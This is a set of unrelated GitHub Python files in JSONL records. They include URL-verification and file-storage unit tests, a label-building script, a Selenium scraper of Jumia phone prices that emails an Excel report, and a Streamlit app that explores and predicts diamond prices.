'url': 'https://foo',\n 'username': 'username',\n 'password': 'password',\n 'auth_renew': -1\n })\n file_contents = f'{verify_urls.ABSENT} 12 https://foo/bar\\nhttp_500 13 https://foo/baz'\n check_url_results = (verify_urls.ABSENT, 'http_500')\n\n dataset_uris = {12: 'https://foo/bar', 13: 'https://foo/baz'}\n mock_manager = mock.Mock()\n mock_manager.filter.side_effect = lambda id: [mock.Mock(uri=dataset_uris.get(id))]\n\n with mock.patch('geospaas_harvesting.verify_urls.find_provider', return_value=provider), \\\n mock.patch('geospaas_harvesting.verify_urls.DatasetURI.objects', mock_manager):\n\n # force == False, only the URL that returns 404 must be\n # deleted\n buffer = io.StringIO(file_contents)\n with mock.patch('geospaas_harvesting.verify_urls.open', return_value=buffer), \\\n mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.check_url',\n side_effect=check_url_results), \\\n mock.patch('geospaas_harvesting.verify_urls.remove_dataset_uri',\n return_value=(True, True)) as mock_remove:\n self.assertEqual(verify_urls.delete_stale_urls('', {}, force=False), (1, 1))\n self.assertListEqual(\n [args[0][0].uri for args in mock_remove.call_args_list],\n ['https://foo/bar'])\n\n # force == True, both URLs must be deleted\n buffer = io.StringIO(file_contents)\n with mock.patch('geospaas_harvesting.verify_urls.open', return_value=buffer), \\\n mock.patch('geospaas_harvesting.verify_urls.HTTPProvider.check_url',\n side_effect=check_url_results), \\\n mock.patch('geospaas_harvesting.verify_urls.remove_dataset_uri',\n return_value=(True, True)) as mock_remove:\n self.assertEqual(verify_urls.delete_stale_urls('', {}, 
force=True), (2, 2))\n self.assertListEqual(\n [args[0][0].uri for args in mock_remove.call_args_list],\n ['https://foo/bar', 'https://foo/baz'])\n\n # The URI does not exist\n buffer = io.StringIO(file_contents)\n with mock.patch('geospaas_harvesting.verify_urls.open', return_value=buffer):\n mock_manager.filter.side_effect = None\n mock_manager.filter.return_value = []\n with self.assertLogs(verify_urls.logger, level=logging.WARNING):\n self.assertEqual(verify_urls.delete_stale_urls('', {}, force=False), (0, 0))\n\n def test_remove_dataset_uri_and_dataset(self):\n \"\"\"The URI should be removed, as well as the corresponding\n dataset if it does not have anymore URIs\n \"\"\"\n dataset_uri = mock.Mock()\n dataset_uri.delete.return_value = (1, {'catalog.DatasetURI': 1})\n dataset_uri.dataset.delete.return_value = (1, {'catalog.Dataset': 1})\n\n # simulate empty queryset\n dataset_uri.dataset.dataseturi_set.all.return_value = []\n self.assertTupleEqual(verify_urls.remove_dataset_uri(dataset_uri), (True, True))\n dataset_uri.delete.assert_called_once_with()\n dataset_uri.dataset.delete.assert_called_once_with()\n\n def test_remove_dataset_uri_but_not_dataset(self):\n \"\"\"The URI should be removed, but not the corresponding\n dataset if it has more URIs\n \"\"\"\n dataset_uri = mock.Mock()\n dataset_uri.delete.return_value = (1, {'catalog.DatasetURI': 1})\n\n # simulate queryset with one element\n dataset_uri.dataset.dataseturi_set.all.return_value = [mock.Mock()]\n self.assertTupleEqual(verify_urls.remove_dataset_uri(dataset_uri), (True, False))\n dataset_uri.delete.assert_called_once_with()\n dataset_uri.dataset.delete.assert_not_called()\n\n def test_dataset_uri_and_dataset_not_removed(self):\n \"\"\"If the URI and/or dataset are not removed,\n remove_dataset_uri() should return booleans indicating so.\n This should not usually happen.\n \"\"\"\n dataset_uri = mock.Mock()\n dataset_uri.delete.return_value = (0, {'catalog.DatasetURI': 0})\n dataset_uri.dataset.delete.return_value = (0, {'catalog.Dataset': 0})\n\n # simulate empty queryset\n dataset_uri.dataset.dataseturi_set.all.return_value = []\n self.assertTupleEqual(verify_urls.remove_dataset_uri(dataset_uri), (False, False))\n dataset_uri.delete.assert_called_once_with()\n dataset_uri.dataset.delete.assert_called_once_with()\n\n def test_find_provider(self):\n \"\"\"Should return the right provider given a URL\"\"\"\n scihub_provider = verify_urls.HTTPProvider('scihub', {\n 'url': 'https://scihub.copernicus.eu/',\n 'username': 'scihub_user',\n 'password': 'scihub_pass',\n 'throttle': 0\n })\n podaac_provider = verify_urls.HTTPProvider('podaac', {\n 'url': 'https://opendap.jpl.nasa.gov/opendap/',\n 'username': 'podaac_user',\n 'password': 'podaac_pass',\n 'throttle': 0\n })\n providers = [scihub_provider, podaac_provider]\n\n self.assertIsNone(verify_urls.find_provider('foo.txt', providers))\n self.assertEqual(\n verify_urls.find_provider('scihub_stale_urls_2021-05-25T10:22:27.txt', providers),\n scihub_provider)\n self.assertEqual(\n verify_urls.find_provider('podaac_stale_urls_2021-05-25T10:22:28.txt', providers),\n podaac_provider)\n\n def test_check_providers(self):\n \"\"\"Should run URL checks for each provider in a separate\n process. 
If an exception is raised in one of the sub-processes,\n check_providers() should return False and the traceback of the\n exception should be logged\n \"\"\"\n providers = [\n verify_urls.HTTPProvider('scihub', {\n 'url': 'https://scihub.copernicus.eu/',\n 'username': 'scihub_user',\n 'password': 'scihub_pass',\n 'throttle': 0\n }),\n verify_urls.HTTPProvider('podaac', {\n 'url': 'https://opendap.jpl.nasa.gov/opendap/',\n 'username': 'podaac_user',\n 'password': 'podaac_pass',\n 'throttle': 0\n }),\n verify_urls.FTPProvider('rtofs', {\n 'url': 'ftp://ftpprd.ncep.noaa.gov/pub/data/nccf/com/rtofs/prod/'\n }),\n ]\n\n with mock.patch('concurrent.futures.ProcessPoolExecutor') as mock_pool, \\\n mock.patch('geospaas_harvesting.verify_urls.datetime') as mock_datetime, \\\n mock.patch('geospaas_harvesting.verify_urls.'\n 'HTTPProvider.check_all_urls') as mock_http_check, \\\n mock.patch('geospaas_harvesting.verify_urls.'\n 'FTPProvider.check_all_urls') as mock_ftp_check, \\\n mock.patch('concurrent.futures.as_completed', iter):\n mock_executor = mock_pool.return_value.__enter__.return_value\n mock_datetime.now.return_value.strftime.return_value = 'time'\n self.assertTrue(verify_urls.check_providers('foo', providers))\n mock_executor.submit.assert_has_calls((\n mock.call(\n mock_http_check,\n os.path.join('foo', 'scihub_stale_urls_time.txt')),\n mock.call(\n mock_http_check,\n os.path.join('foo', 'podaac_stale_urls_time.txt')),\n mock.call(\n mock_ftp_check,\n os.path.join('foo', 'rtofs_stale_urls_time.txt'))\n ), any_order=True)\n self.assertEqual(len(mock_executor.submit.call_args_list), 3)\n\n mock_executor.submit.return_value.result.side_effect = AttributeError\n with self.assertLogs(verify_urls.logger, level=logging.ERROR):\n self.assertFalse(verify_urls.check_providers('foo', providers))\n\n\n def test_read_config(self):\n \"\"\"Should read the provider configuration from a YAML file\"\"\"\n config = textwrap.dedent('''---\n podaac:\n url: 'https://opendap.jpl.nasa.gov/opendap/'\n scihub:\n url: 'https://scihub.copernicus.eu/'\n username: !ENV 'COPERNICUS_OPEN_HUB_USERNAME'\n password: !ENV 'COPERNICUS_OPEN_HUB_PASSWORD'\n creodias:\n url: 'https://zipper.creodias.eu/'\n username: !ENV 'CREODIAS_USERNAME'\n password: !ENV 'CREODIAS_PASSWORD'\n token_url: 'https://auth.creodias.eu/auth/realms/DIAS/protocol/openid-connect/token'\n client_id: 'CLOUDFERRO_PUBLIC'\n throttle: 1\n auth_renew: 36000\n rtofs:\n url: 'ftp://ftpprd.ncep.noaa.gov/pub/data/nccf/com/rtofs/prod/'\n ''')\n environment = {\n 'COPERNICUS_OPEN_HUB_USERNAME': 'copernicus_user',\n 'COPERNICUS_OPEN_HUB_PASSWORD': 'copernicus_password',\n 'CREODIAS_USERNAME': 'creodias_user',\n 'CREODIAS_PASSWORD': 'creodias_password',\n }\n # we check that get_auth() is called with the right arguments\n # by replacing its output by its arguments\n with mock.patch('geospaas_harvesting.verify_urls.open', mock.mock_open(read_data=config)), \\\n mock.patch('os.environ', environment):\n providers = verify_urls.read_config('foo.yml')\n\n self.assertListEqual(providers, [\n verify_urls.HTTPProvider('podaac', {\n 'url': 'https://opendap.jpl.nasa.gov/opendap/',\n }),\n verify_urls.HTTPProvider('scihub', {\n 'url': 'https://scihub.copernicus.eu/',\n 'username': 'copernicus_user',\n 'password': 'copernicus_password'\n }),\n verify_urls.HTTPProvider('creodias', {\n 'url': 'https://zipper.creodias.eu/',\n 'username': 'creodias_user',\n 'password': 'creodias_password',\n 'token_url': 'https://auth.creodias.eu/auth/realms/DIAS/protocol/'\n 
'openid-connect/token',\n 'client_id': 'CLOUDFERRO_PUBLIC',\n 'throttle': 1,\n 'auth_renew': 36000\n }),\n verify_urls.FTPProvider('rtofs', {\n 'url': 'ftp://ftpprd.ncep.noaa.gov/pub/data/nccf/com/rtofs/prod/'\n })\n ])\n\n def test_get_http_provider(self):\n \"\"\"Test that a HTTPProvider is returned when the url starts\n with 'http'\n \"\"\"\n self.assertIsInstance(\n verify_urls.get_provider('test', {'url': 'http://foo'}),\n verify_urls.HTTPProvider)\n self.assertIsInstance(\n verify_urls.get_provider('test', {'url': 'https://foo'}),\n verify_urls.HTTPProvider)\n\n def test_get_ftp_provider(self):\n \"\"\"Test that a FTPProvider is returned when the url starts\n with 'ftp'\n \"\"\"\n self.assertIsInstance(\n verify_urls.get_provider('test', {'url': 'ftp://foo'}),\n verify_urls.FTPProvider)\n\n def test_get_provider_error(self):\n \"\"\"A ValueError should be raised if no type of provider can be\n chosen\n \"\"\"\n with self.assertRaises(ValueError):\n verify_urls.get_provider('test', {'url': 'file:///foo/'})\n\n def test_bounded_thread_pool_executor_init(self):\n \"\"\"The executor should have a semaphore attribute with an\n initial value equal to the provided queue limit + the number of\n workers\n \"\"\"\n pool_executor = verify_urls.BoundedThreadPoolExecutor(max_workers=1, queue_limit=1)\n self.assertIsInstance(pool_executor.semaphore, verify_urls.BoundedSemaphore)\n self.assertEqual(pool_executor.semaphore._initial_value, 2)\n\n def test_bounded_thread_pool_executor_submit(self):\n \"\"\"This executor should stop adding jobs to its internal queue\n when it hits the limit\n \"\"\"\n # check that the semaphore is acquired and released in a\n # normal case\n with verify_urls.BoundedThreadPoolExecutor(max_workers=1, queue_limit=1) as bounded_pool:\n bounded_pool.semaphore = mock.Mock()\n bounded_pool.submit(lambda x: x, 1,)\n bounded_pool.semaphore.acquire.assert_called()\n bounded_pool.semaphore.release.assert_called()\n\n # check that the semaphore is acquired and released when\n # submit() raises an exception\n with mock.patch('concurrent.futures.ThreadPoolExecutor.submit', side_effect=ValueError):\n with verify_urls.BoundedThreadPoolExecutor(\n max_workers=1, queue_limit=1) as bounded_pool:\n bounded_pool.semaphore = mock.Mock()\n with self.assertRaises(ValueError):\n bounded_pool.submit(lambda x: x, 1,)\n bounded_pool.semaphore.acquire.assert_called()\n bounded_pool.semaphore.release.assert_called()\n","repo_name":"nansencenter/django-geo-spaas-harvesting","sub_path":"tests/test_verify_urls.py","file_name":"test_verify_urls.py","file_ext":"py","file_size_in_byte":43950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10234218755","text":"import unittest\nimport os\nimport sys\nimport shutil\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = os.path.join(\n os.path.dirname(BASE_DIR), \"cloud_credentials.json\")\nsys.path.append(BASE_DIR)\nfrom v1.file_storage import LocalStorage, CloudStorage\n\nSTORAGE_DIR = os.path.join(BASE_DIR, \"storage_test\")\n\nclass TestFileStorage(unittest.TestCase):\n def setUp(self):\n if not os.path.exists(STORAGE_DIR):\n os.mkdir(STORAGE_DIR)\n self.storage = LocalStorage(os.path.join(STORAGE_DIR, \"test.txt\"), \"w\")\n\n def test_write(self):\n self.storage = LocalStorage(os.path.join(STORAGE_DIR, \"test.txt\"), \"w\")\n self.storage.write(\"Hello world\")\n with open(os.path.join(STORAGE_DIR, \"test.txt\"), \"r\") as 
file:\n self.assertEqual(file.read(), \"Hello world\")\n\n def test_read(self):\n self.storage = LocalStorage(os.path.join(STORAGE_DIR, \"test.txt\"), \"r\")\n with open(os.path.join(STORAGE_DIR, \"test.txt\"), \"w\") as file:\n file.write(\"Hello world\")\n self.assertEqual(self.storage.read(), \"Hello world\")\n\n def tearDown(self):\n shutil.rmtree(STORAGE_DIR)\n\nclass TestCloudStorage(unittest.TestCase):\n def setUp(self):\n self.storage = CloudStorage(\"test.txt\")\n self.storage.write(\"Hello world\")\n\n def test_read(self):\n self.assertEqual(self.storage.read(), b\"Hello world\")\n\n def tearDown(self):\n self.storage.blob.delete()\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"danip056/entrega_1","sub_path":"backend/v1/test_filestorage.py","file_name":"test_filestorage.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37815665615","text":"import os \nimport numpy as np\n\n\n#this code can make a label table as the following structure:\n''' \n image gender\n 123456.jpg man\n 123457.jpg woman\n ... ...\n \n''' \n#does this useful? I don't know. At least i didn't use this table for such a simple binary classification \npath_dataset='all'\n#print(type(os.listdir(path_dataset+'/man')))\nlist_man=os.listdir(path_dataset+'/man')\nlist_woman=os.listdir(path_dataset+'/woman')\nlist_man=[[x]+[0] for x in list_man]\nlist_woman=[[x]+[1] for x in list_woman]\n\n\nlist_man.sort()\nlist_woman.sort()\nwhole_list=list_man+list_woman\nwhole_list.sort()\nwhole_list=np.array(whole_list)\n\n#save the label table as the numpy npy format\nnp.save(path_dataset+'/label',whole_list)\n#save the label table as the txt format\nwith open(path_dataset+'/label.txt','w')as txt_label:\n txt_label.write(' image gender'+'\\n')\n for row in whole_list:\n if row[1]=='0':\n txt_label.write(row[0]+' man\\n')\n else:\n txt_label.write(row[0]+' woman\\n')\n\n","repo_name":"CZhihao/gender-prediction","sub_path":"gender_classification/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19127689624","text":"\"\"\"\nCreated on Thu Apr 8 09:06:12 2021\n\n@author: Henry Chuks\n\"\"\"\n\n\n#importing libraries\nfrom openpyxl import Workbook\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException, ElementClickInterceptedException\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport smtplib\nfrom email.message import EmailMessage\nfrom selenium.webdriver.chrome.options import Options\n\n\nopt = Options()\nopt.add_argument(\"--headless\")\n\n#initializing the driver and opening url\ndriver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=opt)\ndriver.maximize_window()\ndriver.get(\"https://www.jumia.com.ng/\")\ndriver.implicitly_wait(10)\ntime.sleep(5)\ndriver.find_element(By.XPATH, \"//input[contains(@id, 'fi-q')]\").send_keys(\"samsung phones\")\ndriver.find_element(By.XPATH, \"//button[contains(@class, 'btn _prim _md -mls -fsh0')]\").click()\n\n#creating empty list for phone names, prices and ratings\nphonesList = []\nratingsList = []\npriceList = 
[]\n\n#This function will be getting the actual data from each page for every device clicked\n#and then appending the data gotten into the empty list as defined above\ndef get_data(phone_name, price, ratings): #function to get phone name, price and ratings for each samsung device\n try:\n phonenames = driver.find_element(By.XPATH, str(phone_name))\n phonesList.append(phonenames.text)\n except NoSuchElementException:\n phonenames = 'Nan'\n phonesList.append(phonenames)\n \n try:\n prices = driver.find_element(By.XPATH, str(price))\n priceList.append(prices.text)\n except NoSuchElementException:\n prices = 'Nan'\n priceList.append(prices)\n \n try:\n rating = driver.find_element(By.XPATH, str(ratings))\n ratingsList.append(rating.text)\n except NoSuchElementException:\n rating = 'Nan'\n ratingsList.append(rating)\n \n #priceList.pop()\n \n\"\"\"\nThe function below is literally just to deal wth the stale element reference exception\n\"\"\"\ndef get_page():\n try:\n get_data('//h1[@class=\"-fs20 -pts -pbxs\"]', '//*[@id=\"jm\"]/main/div[2]/section/div/div[2]/div[2]/div[3]/span',\n '//*[@id=\"jm\"]/main/div[2]/section/div/div[2]/div[2]/div[2]/div')\n except StaleElementReferenceException:\n get_data('//h1[@class=\"-fs20 -pts -pbxs\"]', '//*[@id=\"jm\"]/main/div[2]/section/div/div[2]/div[2]/div[3]/span',\n '//*[@id=\"jm\"]/main/div[2]/section/div/div[2]/div[2]/div[2]/div')\n\n#This function will click on every device on the each page and get data with the get_data() function defined above \ndef click_main():\n main = driver.find_elements(By.XPATH, '//div[@class=\"info\"]')\n for c in range(1,len(main)+1):\n click_on = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"jm\"]/main/div[2]/div[3]/section/div[1]/article['+str(c)+']/a/div[2]'))\n )\n driver.execute_script(\"arguments[0].click();\", click_on)\n #click_on.click()\n get_page()\n time.sleep(3)\n driver.execute_script(\"window.history.go(-1)\")\n time.sleep(2)\n \n#this will scrap the first page loaded\nclick_main() \n#get_data('//h3[contains(@class, \"name\")]', 'prc', 'stars _s') #ignore please\n\n\"\"\"\nthe following try and except blocks will be responsible for clicking through the next pages after scraping each page\nuntil it gets to the fifth page\n\"\"\"\ntry:\n element = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, \"/html/body/div[1]/main/div[2]/div[3]/section/div[2]/a[4]\"))\n )\n driver.execute_script(\"arguments[0].click();\", element)\n print(\"Collected data on First page\")\nexcept ElementClickInterceptedException:\n try:\n nextPage = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"a.pg:nth-child(4)\"))\n )\n driver.execute_script(\"arguments[0].click();\", nextPage)\n print(\"Collected data on first page by Second try\")\n except Exception as e:\n print(\"Driver couldn't reach the second page\")\n print(e)\ntime.sleep(5)\nclick_main()\n\ntry:\n pageThree = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"jm\"]/main/div[2]/div[3]/section/div[2]/a[5]'))\n )\n driver.execute_script(\"arguments[0].click();\", pageThree)\n print(\"Collected data on Second page\")\nexcept ElementClickInterceptedException:\n print(\"Driver couldn't reach the third page\")\n driver.quit()\ntime.sleep(5)\nclick_main()\n\ntry:\n pageFour = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"jm\"]/main/div[2]/div[3]/section/div[2]/a[5]'))\n )\n 
driver.execute_script(\"arguments[0].click();\", pageFour)\n print(\"Collected data on Third page\")\nexcept ElementClickInterceptedException:\n print(\"Driver couldn't reach the fourth page\")\n driver.quit()\ntime.sleep(5)\nclick_main()\n\ntry:\n pageFive = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"jm\"]/main/div[2]/div[3]/section/div[2]/a[5]'))\n )\n driver.execute_script(\"arguments[0].click();\", pageFive)\n print(\"Collected data on Fourth page\")\nexcept ElementClickInterceptedException:\n print(\"Driver couldn't reach the fifth page\")\n driver.quit()\ntime.sleep(5)\nclick_main()\n\nprint(\"Collected data on the fifth page\")\n\nprint(\"Done!\")\n\n\n\"\"\"\nThe section above from line 92 to 149 would actually be a good part to implement the python loop, for loop to be precise, which I have also\nwritten in a seperate file, it was only done this way given the few number of pages to be scraped, however if there were about a tens\nof a bigger amount of pages to be scraped then the for loop which I ve written as is also part this github repo as \"the for loop\" should definitely\nbe implemented otherwise\n\"\"\"\n\nprint(len(phonesList))\nprint(len(priceList))\nprint(len(ratingsList))\n\n\"\"\"\nThe following 'if else' block will be responsible for creating and putting the scrapped data into as excel file and sending to the special\nemail address which is mine too, just to showcase it\nBut first it will compare the lengths of the price list, phone list and rating list to check if they are equal\nbecause if not, then the finallist created to zip them will be inaccurate and hence will cause analytical error if the data should be used for\nanalysis\n\"\"\"\n\n\nif len(phonesList)==len(priceList) and len(phonesList)==len(ratingsList) and len(priceList)==len(ratingsList):\n finallist = zip(phonesList, priceList, ratingsList)\n \n wb = Workbook()\n wb['Sheet'].title = 'Jumia Samsung Data'\n sh1 = wb.active\n sh1.append(['Name', 'Price', 'Ratings'])\n \n for x in list(finallist):\n sh1.append(x)\n \n wb.save(\"JumiaSamsungData.xlsx\")\n \n print(\"Sending Email...\\n\")\n password = input(\"Type password here and press enter: \")\n \n msg = EmailMessage()\n msg['Subject'] = 'Scraped Data on Samsung phones from jumia.com'\n msg['From'] = 'HENRY.ANG'\n msg['To'] = 'henrychukwu134@gmail.com'\n \n with open('EmailTemplate') as file:\n data = file.read()\n msg.set_content(data)\n \n with open('JumiaSamsungData.xlsx', 'rb') as f:\n file_data = f.read()\n file_name = f.name\n print(\"File name is \",file_name)\n msg.add_attachment(file_data,maintype=\"multipart\",subtype=\"xlsx\",filename=file_name)\n \n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as server:\n server.login(\"barrychukwu12@gmail.com\", password)\n server.send_message(msg)\n\n print('Email Sent !!!')\n\nelse:\n print(\"Failed to create an Excel file and Email not sent\")\n pass\n","repo_name":"henrychuks002/Data-Scraping-with-Selenium","sub_path":"Data Collection project/jumiadata.py","file_name":"jumiadata.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73153165531","text":"import pandas as pd\r\nimport numpy as np\r\nimport streamlit as st\r\nimport datetime\r\nimport plotly.express as px\r\nimport plotly.figure_factory as ff\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.pipeline import Pipeline\r\nimport 
warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\nfrom sklearn.svm import LinearSVR\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, mean_absolute_percentage_error, r2_score\r\n\r\n\r\nst.set_page_config(layout=\"wide\")\r\n\r\n\r\n#@st.cache(allow_output_mutation=True)\r\ndef get_data():\r\n df = pd.read_csv(\"diamonds.csv\")\r\n df = df.drop(['Unnamed: 0'], axis=1)\r\n return df\r\n\r\nData = get_data()\r\n\r\n## Title\r\nst.markdown(\"
REPORT
\", unsafe_allow_html=True)\r\n\r\n\r\n## Greeting\r\nnow = datetime.datetime.now()\r\nhour = now.hour\r\nif hour < 12:\r\n greeting = \"Good morning\"\r\nelif hour < 17:\r\n greeting = \"Good afternoon\"\r\nelse:\r\n greeting = \"Good evening\"\r\nst.write(\"{}!\".format(greeting))\r\n\r\nst.markdown(\"
========================================================================================
\", unsafe_allow_html=True)\r\n\r\nclarity_oder = ['IF', 'VVS1', 'VVS2', 'VS1', 'VS2', 'SI1', 'SI2', 'I1', 'Ideal', 'Premium', 'Very Good', 'Good', 'Fair']\r\ncode1_s = [1, 2, 3, 4, 5, 6, 7, 8, 1, 2, 3, 4, 5]\r\n\r\n\r\n##Part -1 EDA\r\nst.sidebar.write('EDA Report')\r\nDataset = st.sidebar.checkbox(\"Dataset\")\r\nif Dataset:\r\n st.markdown(\"
Dataset Head
\", unsafe_allow_html=True)\r\n st.table(Data.head())\r\n st.write(Data.shape)\r\n\r\nEDA = st.sidebar.checkbox(\"EDA\")\r\nif EDA:\r\n st.markdown(\"
Exploratory Data Analysis
\", unsafe_allow_html=True)\r\n Describe = st.checkbox(\"Describe\")\r\n Indivual = st.checkbox(\"Indivual\")\r\n if Describe:\r\n st.markdown(\"
Descriptive Statistics
\", unsafe_allow_html=True)\r\n st.table(Data.describe())\r\n df = Data.corr()\r\n df = round(df,2)\r\n fig = px.imshow(df, width=800, height=800, text_auto=True, color_continuous_scale='RdBu_r')\r\n st.markdown(\"
Correlation
\", unsafe_allow_html=True)\r\n st.plotly_chart(fig)\r\n\r\n\r\n\r\n if Indivual:\r\n col1, col2 = st.columns([1, 1])\r\n select_column = col1.selectbox(\"Select Column\", (\"color\", \"clarity\", \"cut\", \"carat\", \"depth\", \"table\",\"x\",\"y\",\"z\"))\r\n cart = [\"color\", \"clarity\", \"cut\"]\r\n cl1, cl2 = st.columns([1, 1])\r\n if select_column in cart:\r\n df1 = Data.groupby(by=[select_column]).size().reset_index(name=\"counts\")\r\n df1['ss'] = df1[select_column].replace(clarity_oder, code1_s)\r\n df1 = pd.DataFrame(df1.sort_values(by=['ss']))\r\n df1 = df1.drop('ss', axis=1, inplace=False)\r\n df1 = df1.reset_index(drop=True)\r\n Data['PPC'] = Data['price']/Data['carat']\r\n fig = px.bar(df1, x=select_column, y=\"counts\", title=\"Count Plot\", color=select_column, width=400, height=400)\r\n fig1 = px.pie(df1, values='counts', names=select_column, title='Pie Chart', width=400,\r\n height=400)\r\n fig0 = px.box(Data, y=\"price\", x=select_column, width=800, height=600, color=select_column)\r\n else:\r\n x = select_column\r\n fig = px.box(Data, y=x, title=\"Box Plot\", width=400, height=400)\r\n fig1 = px.histogram(Data, x=x, title=\"Histogram\", width=400, height=400)\r\n fig0 = ff.create_2d_density(Data['price'], Data[x], width=800, height=600)\r\n #iplot(fig)\r\n cl1.plotly_chart(fig)\r\n cl2.plotly_chart(fig1)\r\n st.plotly_chart(fig0)\r\n\r\n # fig = px.violin(Data, y=\"price\", x=\"color\", width=800, height=500)\r\n # st.plotly_chart(fig)\r\n # fig = plt.figure(figsize=(10, 4))\r\n # sns.violinplot(data=Data, x=\"color\", y=\"price\", split=True)\r\n # st.pyplot(fig)\r\n\r\nData1 = Data\r\n\r\nle = LabelEncoder()\r\n\r\nData1['cut'] = le.fit_transform(Data1['cut'])\r\nData1['color'] = le.fit_transform(Data1['color'])\r\nData1['clarity'] = le.fit_transform(Data1['clarity'])\r\n\r\nX=Data1.drop('price',axis=1)\r\ny=Data1['price']\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\r\n\r\nRe = st.sidebar.selectbox(\"Select\",(\"LinearSVR\",\"KNeighborsRegressor\",\"LinearRegression\",\"RandomForestRegressor\",\r\n \"GradientBoostingRegressor\",\"DecisionTreeRegressor\"))\r\n\r\nif Re == \"LinearSVR\":\r\n pipe1 = Pipeline([\r\n ('scaler', StandardScaler()),\r\n ('model', LinearSVR(random_state = 42))])\r\n\r\n model = pipe1.fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nelif Re == \"KNeighborsRegressor\":\r\n pipe2 = Pipeline([\r\n ('scaler', MinMaxScaler()),\r\n ('model', KNeighborsRegressor())])\r\n\r\n model = pipe2.fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nelif Re == \"LinearRegression\":\r\n pipe3 = Pipeline([\r\n ('scaler', StandardScaler()),\r\n ('model', LinearRegression())])\r\n\r\n model = pipe3.fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nelif Re == \"RandomForestRegressor\":\r\n model = RandomForestRegressor(random_state = 42).fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nelif Re == \"GradientBoostingRegressor\":\r\n model = GradientBoostingRegressor(random_state = 42).fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nelif Re == \"DecisionTreeRegressor\":\r\n model = DecisionTreeRegressor(random_state = 42).fit(X_train, y_train)\r\n\r\n y_pred = model.predict(X_test)\r\n\r\nresult = st.sidebar.checkbox(\"Show Result Score\")\r\na = mean_absolute_error(y_test, y_pred)\r\nb = mean_absolute_percentage_error(y_test, y_pred)\r\nc = mean_squared_error(y_test, y_pred, squared = True)\r\nd = mean_squared_error(y_test, 
y_pred, squared = False)\r\ne = r2_score(y_test, y_pred)*100\r\nTable = {\r\n \"Results\": [\"MAE\", \"MAPE\", \"MSE\", \"RMSE\", \"R2\"],\r\n \"Score\": [a, b, c, d, e]\r\n}\r\ntable = pd.DataFrame(Table)\r\nif result:\r\n st.title(Re)\r\n st.table(table)\r\n\r\n#Predication\r\npr = st.sidebar.checkbox(\"Predication\")\r\nif pr:\r\n col1, col2 = st.columns([1,1])\r\n c1 = col1.selectbox(\"Color\",('D','E','F','G','H','I','J'))\r\n cl1 = col2.selectbox(\"Clarity\",('IF','VVS1','VVS2','VS1','VS2','SI1','SI2','I1'))\r\n cu1 = col1.selectbox(\"Cut\",('Ideal','Premium','Very Good','Good','Fair'))\r\n ca1 = col2.number_input(\"Carat\")\r\n dp1 = col1.number_input(\"Depth\")\r\n tb1 = col2.number_input(\"Table\")\r\n x1 = col1.number_input(\"x\")\r\n y1 = col2.number_input(\"y\")\r\n z1 = col1.number_input(\"z\")\r\n\r\n st.button(\"Predict\")\r\n\r\n pred = X_test\r\n pred = pred.iloc[0:0]\r\n pred = pred.append({'carat': ca1, 'cut': 2, 'color': 0, 'clarity': 4, 'depth': dp1, 'table': tb1, 'x': x1, 'y': y1, 'z': z1}, ignore_index=True)\r\n\r\n #model = RandomForestRegressor(random_state=42).fit(X_train, y_train)\r\n y_pred = model.predict(pred)\r\n y_pred = round(y_pred[0],1)\r\n st.markdown(f\"
Price : ${y_pred}
